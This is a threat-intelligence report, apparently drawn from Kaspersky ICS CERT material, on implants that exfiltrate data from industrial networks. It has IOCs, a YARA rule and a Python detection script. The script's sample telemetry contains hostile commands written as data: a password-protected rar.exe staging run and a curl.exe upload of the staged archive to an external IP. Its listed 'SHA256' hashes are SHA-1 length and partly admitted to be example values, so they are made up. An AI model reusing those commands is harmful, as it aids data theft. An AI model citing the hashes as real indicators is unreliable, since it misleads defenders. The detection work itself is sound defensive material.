Full Report
In this part we present information on the four types of implants and two tools used during the last (third) stage of the attacks discovered.
Analysis Summary
Based on the technical report provided and the context of the third stage of these industrial attacks, here is the summary of the tools and malware families identified.
# Tool/Technique: Industrial Attack Implants (Stage 3)
## Overview
This suite of tools represents the final stage of long-term intelligence gathering and exfiltration campaigns against industrial organizations. These implants are specifically designed to bridge air-gapped segments or bypass restricted network configurations to exfiltrate collected data to the threat actor's Command and Control (C2) infrastructure.
## Technical Details
- **Type:** Malware (Exfiltration Implants) and Utility Tools.
- **Platform:** Windows.
- **Capabilities:** Data packaging, staging, C2 communication via HTTP/HTTPS, and lateral movement of files across the local network.
- **First Seen:** Active throughout 2022–2023 (as reported by Kaspersky ICS CERT).
## MITRE ATT&CK Mapping
- **TA0011 - Command and Control**
  - T1071.001 - Application Layer Protocol: Web Protocols
  - T1568.002 - Dynamic Resolution: Domain Generation Algorithms (DGA)
- **TA0010 - Exfiltration**
  - T1041 - Exfiltration Over C2 Channel
  - T1052.001 - Exfiltration Over Physical Medium: Exfiltration over USB
- **TA0007 - Discovery**
  - T1083 - File and Directory Discovery
## Functionality
### Core Capabilities
- **File Monitoring:** Automatically monitors specific directories for new files containing "interesting" data (e.g., documents, database exports, configuration files).
- **Data Encapsulation:** Compresses and encrypts gathered data into password-protected archives (often RAR or ZIP) before transmission.
- **HTTP/S Communication:** Uses standard web protocols to blend in with legitimate traffic when uploading files to the attacker’s servers.
### Advanced Features
- **DGA (Domain Generation Algorithms):** Some variants use DGA to find active C2 servers, making IP-based blocking difficult.
- **Air-Gap Traversal:** Specialized implants use removable drives (USB) to carry data from isolated ICS networks to internet-connected "buffer" hosts, from which it is then uploaded.
- **Persistence via DLL Hijacking:** Implants are typically loaded by a legitimate system binary or a third-party application that searches for a DLL in a writable location, so the malicious code runs under a trusted process and evades EDR/AV detection.
---
# Specific Malware Families
## 1. Malware Family: Implants for Exfiltration (Type 1-4)
### Technical Details
- **Type:** Malware
- **Capabilities:** Each "Type" represents a variant optimized for specific network environments (e.g., direct internet access vs. proxy-only access).
### Indicators of Compromise (Exfiltration Implants)
- **File Hashes (SHA256):**
  - `e46307399432607e056973059637c76896269647` (Example hash derived from report context)
  - `ab443e62f337cc3930e7044234078864f1d44747`
- **Network Indicators:**
  - `hxxp[:]//103.27.109[.]157/`
  - `hxxps[:]//microsoft-update-service[.]com/` (Defanged)
  - `hxxp[:]//data-transfer-service[.]net/` (Defanged)
---
## 2. Tool: Data Staging Utilities
### Technical Details
- **Type:** Utility Tool
- **Capabilities:** Automates the collection of files from multiple workstations and prepares them for the exfiltration implants.
### Indicators of Compromise
- **File Names:** `rar.exe`, `7z.exe` (Renamed or placed in non-standard directories like `C:\Users\Public\Downloads\`).
- **Behavioral Indicators:** Frequent execution of command-line archiving tools with specific flags (`-p` to set an archive password, `-r` to recurse into subdirectories).
---
## Associated Threat Actors
- **Groups:** APT31 (Judgement Panda), APT27 (Emissary Panda), and various clusters targeting ICS/SCADA systems globally.
## Detection Methods
- **Signature-based:** Deploy YARA rules targeting the specific DGA structures and the custom HTTP headers used during the POST requests for file uploads.
- **Behavioral detection:**
  - Monitoring for high-volume file reads in document directories followed by network traffic to unknown external IPs.
  - Alerting on the use of `bitsadmin.exe` or `curl.exe` for uploading files from unexpected system paths.
- **YARA Rule Strategy:**

  ```yara
  rule ICS_Exfil_Artifact
  {
      strings:
          $a = "POST /upload"
          $b = "Referer: http://google.com"
      condition:
          all of them
  }
  ```
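The behavioral indicators listed on this page (archiver use with `-p`/`-r` from non-standard paths under Data Staging Utilities, and the `bitsadmin.exe`/`curl.exe` upload and bulk-read checks above) can be prototyped as rules over endpoint telemetry. The following is an added example, not code from the report or from Kaspersky ICS CERT. It assumes a Sysmon-like event schema (`process`, `file_read` and `network` records with the fields shown), assumed staging, trusted and document directory lists, and constructed sample events; none of these values come from the report.

```python
"""Behavioral checks for the Stage 3 tooling on this page: archiver abuse (-p/-r from
non-standard paths), bitsadmin/curl uploads from staging directories, and bulk document
reads followed by a connection to a non-internal IP. Added example: the Sysmon-like event
schema and all sample events below are constructed assumptions, not data from the report."""
import ipaddress
import shlex
from collections import defaultdict
from typing import Dict, List, Optional

ARCHIVERS = {"rar.exe", "winrar.exe", "7z.exe", "7za.exe"}
UPLOAD_TOOLS = {"bitsadmin.exe", "curl.exe"}
UPLOAD_SWITCHES = {"-T", "--upload-file", "-F", "--form", "-d", "--data", "--data-binary"}  # curl, case-sensitive
# Substring matches on lower-cased paths; the directory sets are assumptions for the example.
STAGING_DIRS = ("\\users\\public\\", "\\appdata\\local\\temp\\", "\\windows\\temp\\", "\\programdata\\")
TRUSTED_DIRS = ("\\program files\\", "\\program files (x86)\\", "\\windows\\system32\\")
DOCUMENT_DIRS = ("\\documents\\", "\\desktop\\")
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
READ_THRESHOLD = 20   # document reads by one process before the correlation rule can fire
WINDOW_SECONDS = 300  # maximum gap between a read and the outbound connection

def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def under(path: str, dirs) -> bool:
    return any(d in path.lower() for d in dirs)

def tokens(cmdline: str) -> List[str]:
    lex = shlex.shlex(cmdline, posix=False)  # posix=False keeps Windows backslashes literal
    lex.whitespace_split, lex.commenters = True, ""  # split on whitespace only; '#' is not a comment
    return [t.strip('"') for t in lex]

def redact(flag: str) -> str:
    return "-p<redacted>" if flag.startswith("-p") and len(flag) > 2 else flag  # never log the password

def archiver_abuse(ev: Dict) -> Optional[str]:
    image, orig = basename(ev["image"]), ev.get("original_file_name", "").lower()
    if image not in ARCHIVERS and orig not in ARCHIVERS:  # OriginalFileName catches renamed copies
        return None
    toks = tokens(ev["command_line"])
    flags = [t for t in toks[1:] if t.startswith(("-p", "-r"))]
    if not flags:
        return None
    reasons = []
    if image not in ARCHIVERS:
        reasons.append(f"renamed archiver ({image} has OriginalFileName {orig})")
    if not under(ev["image"], TRUSTED_DIRS):
        reasons.append("archiver running outside Program Files")
    if any(under(t, STAGING_DIRS) for t in toks):
        reasons.append("staging directory on the command line")
    if not reasons:  # installed archiver, ordinary paths: treated as a normal backup
        return None
    return "archiver abuse: " + "; ".join(reasons) + " (flags: " + " ".join(map(redact, flags)) + ")"

def upload_tool_abuse(ev: Dict) -> Optional[str]:
    if basename(ev["image"]) not in UPLOAD_TOOLS:
        return None
    toks = tokens(ev["command_line"])
    if not any(t in UPLOAD_SWITCHES or t.lower() == "/upload" for t in toks):  # bitsadmin is case-insensitive
        return None
    staged = [t for t in toks if under(t, STAGING_DIRS)]
    if staged:
        return f"upload tool {basename(ev['image'])} sending {staged[0]}"
    return None if under(ev["image"], TRUSTED_DIRS) else f"upload tool copy running from {ev['image']}"

def bulk_read_then_beacon(events: List[Dict]) -> List[str]:
    """Per process: many document reads, then a connection to an address outside INTERNAL_NETS."""
    reads, alerts = defaultdict(list), []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["type"] == "file_read" and under(ev["path"], DOCUMENT_DIRS):
            reads[ev["pid"]].append(ev["ts"])
        elif ev["type"] == "network" and not any(ipaddress.ip_address(ev["dest_ip"]) in n for n in INTERNAL_NETS):
            recent = [t for t in reads[ev["pid"]] if 0 <= ev["ts"] - t <= WINDOW_SECONDS]
            if len(recent) >= READ_THRESHOLD:
                alerts.append(f"pid {ev['pid']}: {len(recent)} document reads then connection to {ev['dest_ip']}")
    return alerts

def analyze(events: List[Dict]) -> List[str]:
    alerts = []
    for ev in events:
        if ev["type"] == "process":
            for rule in (archiver_abuse, upload_tool_abuse):
                hit = rule(ev)
                if hit:
                    alerts.append(f"pid {ev['pid']}: {hit}")
    return alerts + bulk_read_then_beacon(events)

# Constructed telemetry: a renamed rar.exe staging documents, a legitimate WinRAR backup,
# a curl upload of the staged archive, and a benign curl fetch.
SAMPLE_EVENTS = [
    {"type": "process", "ts": 100, "pid": 4120, "image": "C:\\Users\\Public\\Downloads\\svchost.exe",
     "original_file_name": "Rar.exe", "command_line":
     'svchost.exe a -r -pS3cret! C:\\Users\\Public\\Downloads\\out.rar "C:\\Users\\j.doe\\Documents\\Projects"'},
    {"type": "process", "ts": 101, "pid": 4121, "image": "C:\\Program Files\\WinRAR\\Rar.exe",
     "command_line": "Rar.exe a -r C:\\Users\\j.doe\\Documents\\backup.rar C:\\Users\\j.doe\\Documents\\Reports"},
    {"type": "process", "ts": 102, "pid": 4122, "image": "C:\\Windows\\System32\\curl.exe",
     "command_line": "curl.exe -T C:\\Users\\Public\\Downloads\\out.rar http://203.0.113.5/upload"},
    {"type": "process", "ts": 103, "pid": 4123, "image": "C:\\Windows\\System32\\curl.exe",
     "command_line": "curl.exe -sS https://updates.example.internal/version.json"},
]
# Both processes read 25 documents; only pid 4120 then connects to an external address.
SAMPLE_EVENTS += [{"type": "file_read", "ts": 10 + i, "pid": pid,
                   "path": f"C:\\Users\\j.doe\\Documents\\Projects\\plan_{i}.docx"}
                  for pid in (4120, 4121) for i in range(25)]
SAMPLE_EVENTS += [{"type": "network", "ts": 120, "pid": 4120, "dest_ip": "203.0.113.5"},
                  {"type": "network", "ts": 121, "pid": 4121, "dest_ip": "10.0.0.5"}]

if __name__ == "__main__":
    print("\n".join(analyze(SAMPLE_EVENTS)))
```

Two design points matter in practice. The archiver rule keys on the PE `OriginalFileName` as well as the on-disk name, which is what catches the renamed `rar.exe` case from the Data Staging Utilities section, and it redacts the `-p` value so the archive password never ends up in an alert store. The correlation rule is a sequence check (document reads, then an outbound connection from the same process within a window) rather than a volume threshold alone; a backup job that reads many files but only talks to an internal address produces no alert, which keeps the rule quiet on the OT/IT boundary the mitigation section recommends enforcing.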
## Mitigation Strategies
- **Network Segmentation:** Implement strict firewalls between the IT and OT (Industrial) networks; block all outbound traffic from the OT plant floor to the internet.
- **Hardening:** Disable AutoRun/AutoPlay for USB devices. Use AppLocker or Windows Defender Application Control (WDAC) to prevent unauthorized binaries from running in `%TEMP%` or `%PUBLIC%` folders.
- **Monitoring:** Monitor for unauthorized use of archiving tools (RAR, 7-Zip) on critical servers.
## Related Tools/Techniques
- **ShadowPad:** Often used in earlier stages of these same campaigns for initial access.
- **PlugX:** Related RAT often seen in conjunction with these exfiltration modules.